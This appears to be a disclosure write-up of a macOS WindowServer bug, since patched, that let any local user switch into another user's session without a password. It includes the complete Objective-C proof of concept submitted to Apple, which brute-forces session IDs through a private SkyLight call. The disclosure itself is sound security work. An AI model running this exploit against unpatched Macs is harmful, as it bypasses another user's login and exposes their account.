SkyLight user session exploit

While working on non-Metal acceleration in 2021, I stumbled on a WindowServer bug allowing any user to switch to another user's session without entering their password. Apple fixed the bug in macOS 11.6.1 and 12.0.1 and paid me a generous bounty.




Bizarrely, the bug was reintroduced at some point in Ventura, and fixed again in late 2023, resulting in a second bounty payment.

thanks

ASentientHedgehog and Emma (916253) tested on countless versions and helped me navigate the reporting process. Thank you!

code

This is the program I submitted to Apple. It simply brute-forces SLSSessionSwitchToSessionID, which lacked the necessary checks. A real attacker would do something cleverer; session IDs are readily available in logs and other APIs.

// clang -fmodules -F /System/Library/PrivateFrameworks -framework SkyLight thing.m -o thing @import Foundation; void SLSSessionSwitchToSessionID(int); NSDictionary* SLSCopyCurrentSessionDictionary(); extern NSString* kCGSSessionOnConsoleKey; int main() { for(int guess=0;;guess++) { NSDictionary* dict=SLSCopyCurrentSessionDictionary(); if([dict[kCGSSessionOnConsoleKey] isEqual:@false]) { printf("😁\n"); return 0; } dict.release; SLSSessionSwitchToSessionID(guess); } }